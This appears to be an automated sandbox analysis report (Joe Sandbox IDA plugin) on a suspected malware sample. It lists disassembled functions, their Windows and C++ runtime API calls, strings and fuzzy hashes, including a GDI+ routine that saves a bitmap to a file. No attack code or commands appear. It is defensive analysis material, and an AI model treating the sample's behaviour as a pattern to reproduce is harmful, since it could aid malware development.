API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 10c420daa13962d8c34f07d8e5e57f80696a88d0a8cb060a21b1ba5f72c37537
Instruction ID: 4f98c6a968a786bbabe9cf8dd1bd77c0c3f582db622070c6a9572df94363bb86
Opcode Fuzzy Hash: 10c420daa13962d8c34f07d8e5e57f80696a88d0a8cb060a21b1ba5f72c37537
Instruction Fuzzy Hash: B111A371900524ABCB14EBA1CC41AAE7770AF54315F20003FF812BB2D2DB7C9A05CB9C

Function 00404C0A Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00404C1B
int.LIBCPMT ref: 00404C32

Part of subcall function 0040BD52: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD63
Part of subcall function 0040BD52: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD7D

std::locale::_Getfacet.LIBCPMT ref: 00404C3B
std::_Facet_Register.LIBCPMT ref: 00404C6C
std::_Lockit::~_Lockit.LIBCPMT ref: 00404C82
__CxxThrowException@8.LIBVCRUNTIME ref: 00404CA0

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: cbee11b85212c1946a48863dbeb689ab616e1a132dcf9646d1dd5c10258ca5ca
Instruction ID: 4433383583620685c096cb23b62731a72f637e788ffb24460987deb82302b81b
Opcode Fuzzy Hash: cbee11b85212c1946a48863dbeb689ab616e1a132dcf9646d1dd5c10258ca5ca
Instruction Fuzzy Hash: FE11C671D001249BCB14EBA0C845AED77B4AF54315F20003EE911B72D2DB7C9D04CB9C

Function 020FC3E6 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 020FC3F7
int.LIBCPMT ref: 020FC40E

Part of subcall function 020FBFB9: std::_Lockit::_Lockit.LIBCPMT ref: 020FBFCA
Part of subcall function 020FBFB9: std::_Lockit::~_Lockit.LIBCPMT ref: 020FBFE4

std::locale::_Getfacet.LIBCPMT ref: 020FC417
std::_Facet_Register.LIBCPMT ref: 020FC448
std::_Lockit::~_Lockit.LIBCPMT ref: 020FC45E
__CxxThrowException@8.LIBVCRUNTIME ref: 020FC47C

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: b85ae294a9a7246c3ddfb9f5242bf4fb7b639a16bf2a11cfd9c9e350b2de321b
Instruction ID: cc0bc10ae55b132571d7a0ea6faf099bcf3ebf058760e352c016232fca76d37f
Opcode Fuzzy Hash: b85ae294a9a7246c3ddfb9f5242bf4fb7b639a16bf2a11cfd9c9e350b2de321b
Instruction Fuzzy Hash: F911E5718803199FDB91EBA4DC81AFD77B2AF44710F14441AE61167AE0DB349A04EFA0

Function 020F4E71 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 020F4E82
int.LIBCPMT ref: 020F4E99

Part of subcall function 020FBFB9: std::_Lockit::_Lockit.LIBCPMT ref: 020FBFCA
Part of subcall function 020FBFB9: std::_Lockit::~_Lockit.LIBCPMT ref: 020FBFE4

std::locale::_Getfacet.LIBCPMT ref: 020F4EA2
std::_Facet_Register.LIBCPMT ref: 020F4ED3
std::_Lockit::~_Lockit.LIBCPMT ref: 020F4EE9
__CxxThrowException@8.LIBVCRUNTIME ref: 020F4F07

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: cbee11b85212c1946a48863dbeb689ab616e1a132dcf9646d1dd5c10258ca5ca
Instruction ID: 705543aad08fab466a0b42fd0129869275c4d612b586a635f241ec1200989a44
Opcode Fuzzy Hash: cbee11b85212c1946a48863dbeb689ab616e1a132dcf9646d1dd5c10258ca5ca
Instruction Fuzzy Hash: 5911E5318803199BCBA1EBA4DC40AEE77B6BF44314F150419EB11A76E0EB349904EF90

Function 00404E59 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00404E60

Part of subcall function 0040BB3D: __EH_prolog3_GS.LIBCMT ref: 0040BB44

std::_Locinfo::_Locinfo.LIBCPMT ref: 00404EAB
__Getcoll.LIBCPMT ref: 00404EBA
std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404ECA

Strings

\J@, xrefs: 00404EB4

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
String ID: \J@
API String ID: 1836011271-3870157017
Opcode ID: ecd6d36a17cc43e97ba93c01a623e75c6b96a429ac6ca8fec0051df99147ca39
Instruction ID: fdee6073741f171039223b21022534e6c74e6b1a9002e69b8caf09e8127dea3b
Opcode Fuzzy Hash: ecd6d36a17cc43e97ba93c01a623e75c6b96a429ac6ca8fec0051df99147ca39
Instruction Fuzzy Hash: 1E0169719102099FDB10EFA5C441B9DB7B0FF44319F00803EE145BB6C1DB789544CB99

Function 0042FED4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0042FE85,00000003,?,0042FE25,00000003,00457970,0000000C,0042FF7C,00000003,00000002), ref: 0042FEF4
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0042FF07
FreeLibrary.KERNEL32(00000000,?,?,?,0042FE85,00000003,?,0042FE25,00000003,00457970,0000000C,0042FF7C,00000003,00000002,00000000), ref: 0042FF2A

Strings

CorExitProcess, xrefs: 0042FEFF
mscoree.dll, xrefs: 0042FEED

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: d200b2febff7f97f8a2c3bc9b8f7fbb30bc0a4b2d93706d62895116e71432848
Instruction ID: 04c50191246c36c7712c7b2292fbce18726cdb65abb1a7ec348a7059dfc2f8e8
Opcode Fuzzy Hash: d200b2febff7f97f8a2c3bc9b8f7fbb30bc0a4b2d93706d62895116e71432848
Instruction Fuzzy Hash: D8F0C831A10218BBDB109F90DD09B9EBFB4EF05B12F510076F805A2290CF795E44CB8C

Function 0041CDFD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35threadCOMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0041CE11
Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0041CE35
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041CE48
__CxxThrowException@8.LIBVCRUNTIME ref: 0041CE56

Strings

pScheduler, xrefs: 0041CE40

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
String ID: pScheduler
API String ID: 3657713681-923244539
Opcode ID: 91fe00c27762651b251d8766a9fdc76cd8d1da8bd6571df67899734432931397
Instruction ID: eb07aeb186abff06dd5fb113d00e985a326b9016228af1cb3add82d84dc8ee7b
Opcode Fuzzy Hash: 91fe00c27762651b251d8766a9fdc76cd8d1da8bd6571df67899734432931397
Instruction Fuzzy Hash: 56F05935A40704A3C714FB05DC92CDEB3799E90718760812FE40663182DB7CAD8AC29D

Function 021308E1 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 021308E8
make_shared.LIBCPMT ref: 02130933

Strings

RCC, xrefs: 0213091A
MOC, xrefs: 0213090B
f)D, xrefs: 021308E3

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: H_prolog3_catchmake_shared
String ID: MOC$RCC$f)D
API String ID: 3472968176-2775210027
Opcode ID: 049c7e4c23b10554081dcb12690fd44b5a77b1d87ca30f0fc835f9c7ef2e3319
Instruction ID: e25e67bceed4eab6cef68b2cdfd9269ddda3fec8c24d75902030ce946d917e7b
Opcode Fuzzy Hash: 049c7e4c23b10554081dcb12690fd44b5a77b1d87ca30f0fc835f9c7ef2e3319
Instruction Fuzzy Hash: 52F06270581259CFDF16EF65C440A6C3BB6AF09B00F8640A1E4445B264CB7A9A44DFA2

Function 0042B0F6 Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bca2f52f1a06bb0bf5b391d4a2a7ad694c8b7147332e52eee2e888435f9a20d7
Instruction ID: 170f1839d68b6508eaaaec35cfa06bac438a8aba58ef65257e70e7e464c4b835
Opcode Fuzzy Hash: bca2f52f1a06bb0bf5b391d4a2a7ad694c8b7147332e52eee2e888435f9a20d7
Instruction Fuzzy Hash: 3B71AF31B00266DBCB21CF95E884ABFBB75EF41360B98426BE81067290DB749D45C7E9

Function 0211B35D Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
Instruction ID: 9935c57cd80b457d7e39d30a7a689258809bce3d00417c259fd1687c4cbb53f9
Opcode Fuzzy Hash: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
Instruction Fuzzy Hash: 9771C5719892169BCF258FA5CC84ABFBB76FF4532CF584239E421A7190D7708A41CBA0

Function 00430A34 Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00433697: RtlAllocateHeap.NTDLL(00000000,0040D866,00000000,?,0042678E,00000002,00000000,00000000,00000000,?,0040CD17,0040D866,00000004,00000000,00000000,00000000), ref: 004336C9

_free.LIBCMT ref: 00430B3F
_free.LIBCMT ref: 00430B56
_free.LIBCMT ref: 00430B75
_free.LIBCMT ref: 00430B90
_free.LIBCMT ref: 00430BA7

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: 77b92977eb72739321cda5c8df294ab32c7ea205dca145f02ee4833a4b4424fc
Instruction ID: 2fc0cbae349d2941fff749f5b49d8ba5872ca9652a97fa93675838e70d9d8155
Opcode Fuzzy Hash: 77b92977eb72739321cda5c8df294ab32c7ea205dca145f02ee4833a4b4424fc
Instruction Fuzzy Hash: 3F51D131A00304AFEB219F69D851B6BB7F4EF5C724F14566EE809D7251E739E901CB88

Function 02120C9B Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 021238FE: RtlAllocateHeap.NTDLL(00000000,020FDACD,00000000), ref: 02123930

_free.LIBCMT ref: 02120DA6
_free.LIBCMT ref: 02120DBD
_free.LIBCMT ref: 02120DDC
_free.LIBCMT ref: 02120DF7
_free.LIBCMT ref: 02120E0E

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
Instruction ID: b4117ec74044ae0253ffb04cb5ae8e1e1d217cb48066a1556c0087a58c2e4eaf
Opcode Fuzzy Hash: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
Instruction Fuzzy Hash: 3351E531A81318AFDB24DF29D841B6AB7F5EF58724B14066DF809D7250E736E925CB80

Function 004314CB Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0043153D
_free.LIBCMT ref: 0043155D

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 52f7d06dedb48a2ec426f0ee25480420bcf89ba1a9886730aea307093fcc506c
Instruction ID: 2c394445bd20a04972dd2082f140732d1460e75e39bee70d4e52ced8c5000be3
Opcode Fuzzy Hash: 52f7d06dedb48a2ec426f0ee25480420bcf89ba1a9886730aea307093fcc506c
Instruction Fuzzy Hash: 7A41C432A00304ABCB10DF78C981A5EB7E5EF89714F15456AE616EB391DB35ED01CB88

Function 02121732 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 021217A4
_free.LIBCMT ref: 021217C4

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 52f7d06dedb48a2ec426f0ee25480420bcf89ba1a9886730aea307093fcc506c
Instruction ID: 3eedb0b832a26717bd980aa30b2446a0c97b876ae6a6c0bf56fda955c9e987b0
Opcode Fuzzy Hash: 52f7d06dedb48a2ec426f0ee25480420bcf89ba1a9886730aea307093fcc506c
Instruction Fuzzy Hash: 6E41C332A40314AFCB14DF78C880B5DB7A6EF89714B1545A9E615EB381D731E915CB80

Function 0043688D Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,23E85006,0042D0EA,00000000,00000000,0042D928,?,0042D928,?,00000001,0042D0EA,23E85006,00000001,0042D928,0042D928), ref: 004368DA
__alloca_probe_16.LIBCMT ref: 00436912
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00436963
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00436975
__freea.LIBCMT ref: 0043697E

Part of subcall function 00433697: RtlAllocateHeap.NTDLL(00000000,0040D866,00000000,?,0042678E,00000002,00000000,00000000,00000000,?,0040CD17,0040D866,00000004,00000000,00000000,00000000), ref: 004336C9

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 313313983-0
Opcode ID: f65b0bdcdd2dc54c9e9de8c3602f0d94bdb7d7793a3f10faf503cccdbbfc5f31
Instruction ID: d963c907df35f4e1b8a381e23a898db453a996a2d0481b790983a8c47d787b2f
Opcode Fuzzy Hash: f65b0bdcdd2dc54c9e9de8c3602f0d94bdb7d7793a3f10faf503cccdbbfc5f31
Instruction Fuzzy Hash: 5F31F072A0021AABDF259F65DC41EAF7BA5EF44710F15422AFC04D7290EB39CD54CB94

Function 0041AEB6 Relevance: 7.6, APIs: 5, Instructions: 88COMMON

Download Yara Rule

APIs

_SpinWait.LIBCONCRT ref: 0041AEDB

Part of subcall function 00410F11: _SpinWait.LIBCONCRT ref: 00410F29

Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0041AEEF
Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0041AF21
List.LIBCMT ref: 0041AFA4
List.LIBCMT ref: 0041AFB3

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
String ID:
API String ID: 3281396844-0
Opcode ID: f58ac660b0453a3e9b818a0a9febcd8ba4b28c7f9e8e1f6154efc2f6275add08
Instruction ID: 8a1b27d7ac99c42c423c038c6da62c4f09041a57878ada6c0d5966c490a343f4
Opcode Fuzzy Hash: f58ac660b0453a3e9b818a0a9febcd8ba4b28c7f9e8e1f6154efc2f6275add08
Instruction Fuzzy Hash: 76318B71A02719DFCB10EFA5D5915EEB7B1BF04308F04006FE80167242DB796DA5CB9A

Function 0210B11D Relevance: 7.6, APIs: 5, Instructions: 88COMMON

Download Yara Rule

APIs

_SpinWait.LIBCONCRT ref: 0210B142

Part of subcall function 02101178: _SpinWait.LIBCONCRT ref: 02101190

Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0210B156
Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0210B188
List.LIBCMT ref: 0210B20B
List.LIBCMT ref: 0210B21A

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
String ID:
API String ID: 3281396844-0
Opcode ID: 412e926916d4707ad4bdb87e4df70d0866a2e761e0501b7c3a349567627f0364
Instruction ID: 096989f1584be55c22fa946230c018c3545661f131ba868e5ab65f452d26f8ab
Opcode Fuzzy Hash: 412e926916d4707ad4bdb87e4df70d0866a2e761e0501b7c3a349567627f0364
Instruction Fuzzy Hash: D6316632D89656DFCB14EFA4E9D06EDB7B2BF08308F05406AC85567280CBB56E04CB90

Function 0040202E Relevance: 7.6, APIs: 5, Instructions: 80memoryfilewindowCOMMON

Download Yara Rule

APIs

GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00402060
GdipAlloc.GDIPLUS(00000010), ref: 00402068
GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 00402083
GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 004020AD
GdiplusShutdown.GDIPLUS(?), ref: 004020D9

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: Gdip$Gdiplus$AllocBitmapCreateFileFromImageSaveShutdownStartup
String ID:
API String ID: 2357751836-0
Opcode ID: c047b4a56322b1034ae7938cbcb78c43e1d8d2715f6ad981a1214ddf5e978d77
Instruction ID: 3210944159f0fc98eb109693a3395d5946c9c878d3acb397b58b4dcf5ef0325c
Opcode Fuzzy Hash: c047b4a56322b1034ae7938cbcb78c43e1d8d2715f6ad981a1214ddf5e978d77
Instruction Fuzzy Hash: E72171B5A0031AAFCB10DF65DD459AFFBB8FF48741B104036EA02E3290D7759901CBA8

Function 020F50BC Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

std::_Locinfo::_Locinfo.LIBCPMT ref: 020F5099
std::_Locinfo::~_Locinfo.LIBCPMT ref: 020F50AD

Part of subcall function 020FBDA4: __EH_prolog3_GS.LIBCMT ref: 020FBDAB

std::_Locinfo::_Locinfo.LIBCPMT ref: 020F5112
__Getcoll.LIBCPMT ref: 020F5121
std::_Locinfo::~_Locinfo.LIBCPMT ref: 020F5131

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: Locinfostd::_$Locinfo::_Locinfo::~_$GetcollH_prolog3_
String ID:
API String ID: 1844465188-0
Opcode ID: 44aaa5f46009dce830ee941fe4bea5556b318a4865790ba87b622e4823c10ac4
Instruction ID: 56f3037133c9c9f3ace0e15d8d92f805dc791719e47d9e7e664d5106325d04ed
Opcode Fuzzy Hash: 44aaa5f46009dce830ee941fe4bea5556b318a4865790ba87b622e4823c10ac4
Instruction Fuzzy Hash: BF21A972890309EFEB90EFA0D4447DDBBB2FF90711F50811AD185ABA81DB749944EF91

Function 00431F4E Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0042EABE,00434D6C,?,00431EF8,00000001,00000364,?,0042DFD5,00457910,00000010), ref: 00431F53
_free.LIBCMT ref: 00431F88
_free.LIBCMT ref: 00431FAF
SetLastError.KERNEL32(00000000), ref: 00431FBC
SetLastError.KERNEL32(00000000), ref: 00431FC5

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
Instruction ID: e50af596af166b8a3d4a0e4732677f958598b7c5f443a1734cc3cd8306247ad3
Opcode Fuzzy Hash: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
Instruction Fuzzy Hash: F7014936609A003BD3122B315C45D2B266DABD977AF21212FF805933E2EB2C8902512D

Function 021221B5 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(020FDACD,020FDACD,00000002,0211ED25,02123941,00000000,?,021169F5,00000002,00000000,00000000,00000000,?,020FCF7E,020FDACD,00000004), ref: 021221BA
_free.LIBCMT ref: 021221EF
_free.LIBCMT ref: 02122216
SetLastError.KERNEL32(00000000,?,020FDACD), ref: 02122223
SetLastError.KERNEL32(00000000,?,020FDACD), ref: 0212222C

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
Instruction ID: 5f43abd74d35b4e08f97f4f2bf1d71ba0635e0f4fb83576671c236a4beb9549a
Opcode Fuzzy Hash: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
Instruction Fuzzy Hash: 540149365C17307FC31667346C88E1F265EEBD2B72B510228FC2592290EF76893E8529

Function 00431ECA Relevance: 7.6, APIs: 5, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
_free.LIBCMT ref: 00431F01
_free.LIBCMT ref: 00431F29
SetLastError.KERNEL32(00000000), ref: 00431F36
SetLastError.KERNEL32(00000000), ref: 00431F42

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
Instruction ID: 142cfc1d6fefe371a65853cee7fca9c099a37b51f1b4623e9e727693a4b19c8f
Opcode Fuzzy Hash: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
Instruction Fuzzy Hash: 49F02D3A508A0037D61637266C06B1B2A19AFD9B27F31112FF814D33F2EF2DC802452D

Function 02122131 Relevance: 7.6, APIs: 5, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0211A9DC,?,00000000,?,0211CDD6,020F2474,00000000,?,00451F20), ref: 02122135
_free.LIBCMT ref: 02122168
_free.LIBCMT ref: 02122190
SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 0212219D
SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021221A9

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
Instruction ID: 903c414b941dd2d7a17db860123bb5220830a61d35b7a0bac9b3cec6378ff32a
Opcode Fuzzy Hash: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
Instruction Fuzzy Hash: B2F0F4365C57303FD31A3324AC08F1F266A9FC2B23F650124FE2492290EF75853E896A

Function 00417910 Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041272D: TlsGetValue.KERNEL32(?,?,00410B4B,00412C58,00000000,?,00410B29,?,?,?,00000000,?,00000000), ref: 00412733

Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 0041793A

Part of subcall function 00420FA3: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00420FCA
Part of subcall function 00420FA3: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00420FE3
Part of subcall function 00420FA3: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00421059
Part of subcall function 00420FA3: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00421061

Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 00417948
Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00417952
Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 0041795C
__CxxThrowException@8.LIBVCRUNTIME ref: 0041797A

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
String ID:
API String ID: 4266703842-0
Opcode ID: ddd470ca706d5bdb1fd34f34a64e878e0bf6dea1610dba1cf15e232951c7dc30
Instruction ID: 571f4fa900913ae9ac1b624b88cebae7c96a5b4968f9dadd54c27da6e91ea8e9
